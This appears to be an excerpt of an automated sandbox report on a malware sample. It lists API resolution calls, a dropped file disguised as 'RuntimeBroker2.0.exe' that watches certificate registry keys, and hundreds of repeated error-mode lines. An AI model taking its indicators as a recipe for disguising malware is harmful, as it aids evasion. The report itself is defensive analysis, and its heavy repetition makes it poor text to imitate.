Code function: 5_2_00007FF72B0550B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_00007FF72B0550B0

Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\87Bym0x4Fy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
